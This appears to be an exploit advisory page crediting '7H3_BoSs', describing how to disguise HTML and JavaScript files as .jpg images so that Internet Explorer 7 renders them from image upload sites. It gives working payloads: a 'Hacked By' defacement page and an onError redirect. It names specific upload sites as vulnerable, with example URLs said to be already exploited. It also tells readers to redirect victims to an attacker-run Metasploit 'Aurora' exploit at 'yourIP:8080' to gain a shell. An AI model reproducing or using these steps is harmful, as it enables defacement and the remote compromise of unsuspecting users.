Internet Explorer 8/7 Java Html Codes INJECTION

2010-03-06 / 2012-01-30
Credit: 7H3_BoSs
Risk: High
Local: No
Remote: Yes
CWE: CWE-399


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

############################################# # # # [+] IE 7 Java & Html Codes INJECTION # [+] Discovered By 7H3 BoSs # # ############################################# # # # # [] Founder : [ 7H3 BoSs ] # [] Members : [ ReZa , sub.z3l2o , Wishe ] # [] Team : [ KatRina iRanian Security Team ] # [] Greetz : [ ReZa , sub.z3l2o , Wishe , NEO ] # # # ############################################################################################################### # # # [+] html Exploit Example : # # Open A text document and insert a html code in that like this : # # <html> # <head> # <title>Hacked By KatRina Iranian Hackers</title> # </head> # <body bgcolor=black text=White> # <center><h2>Hacked By KatRina Iranian Hackers</h2> # <img src='http://www.gciran.com/services/graphic/star.jpg'> # <br> # <h2>We Are : </h2> # <bR> # <h2>ReZa , SuB zErO , Wishe , 7H3 BoSs</h2> # </center></body> # </html> # # then save it as jpg format # ############################################################################################################### # # [+] java Script Exploit Example : # # Open A text document and insert a java script code in that like this : # # # <img src="" onError="document.location='http://google.com'"> # # then save it as jpg format # ################################################# # # [+] Introduction : # # then save html code as jpg like KatRina.jpg # or insert java script codes and save it again as jpg file # then upload image in vulnerable images upload centers # remeber 30% of upload centers are vulnerable but not all # # ################################################## # # # [+] Html INJECTION : # # I create a text document and inserted html code in that then save it as jpg # My file name is Katrina.jpg thus i uploaded it in a vulnerable upload centers # # in this image upload center : http://datairan.gigfa.com/index.php # Uploaded file : http://datairan.gigfa.com/files/axc0goer2hor9499need.jpg # note : open in IE7 and you can see html code injected # # another upload center : http://upload.mamazy.net # bypassed : http://upload.mamazy.net/images/oncljs8ef6qng40kily.jpg # # another upload center : http://up.iranblog.com/ # bypassed : http://up.iranblog.com/37261/1267616595.jpg # # ################################################# # # [+] Java Script INJECTION : # # # i Create a text document then inserted Java Script Code in that and save it as jpg # my file name is KatRina.jpg and i inserted : # # <img src="" onError="document.location='http://google.com'"> # # and save it as jpg and upload it in a vulnerable upload centers and victim with IE7 # will redirect to google.com !!! # Example : http://up.iranblog.com/37261/1267642065.jpg # open with IE7 and you will be redirect to http://google.com # note this is example and you can do many things with this # for instant you can use "Aurora" IE Exploit in metasploit and exploit it as http://yourIP:8080/ # and do it like this : # # open a text document and insert : # # <img src="" onError="document.location='http://yourIP:8080'"> # # then save as jpg and upload it in a vulnerable image hosting and give uploaded url to victim # and he or his will redirect to your exploit url and you can gain shell of victim system !!! # ############################################################################################################### # # # [+] some vulnerable upload center : http://up.iranblog.com/ # http://datairan.gigfa.com/index.php # http://fuc.ir/ # http://upload.mamazy.net # # ################################################# # # # [+] Note : # # you can do many things with this method and use many html or java scripts codes or both ! # # # ENJOY ! # ################################################## # # # # [+] Contact : # i.The.l3oSs.i@Gmail.Com # # # ###################################################

References:

http://www.us-cert.gov/cas/techalerts/TA10-055A.html
http://www.kb.cert.org/vuls/id/492515
http://xforce.iss.net/xforce/xfdb/55642
http://www.vupen.com/english/advisories/2010/0135
http://www.securityfocus.com/bid/37815
http://www.microsoft.com/technet/security/Bulletin/MS10-002.mspx
http://www.microsoft.com/technet/security/advisory/979352.mspx
http://www.exploit-db.com/exploits/11167
http://support.microsoft.com/kb/979352
http://securitytracker.com/id?1023462
http://osvdb.org/61697
http://news.cnet.com/8301-27080_3-10435232-245.html
http://blogs.technet.com/msrc/archive/2010/01/14/security-advisory-979352.aspx


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top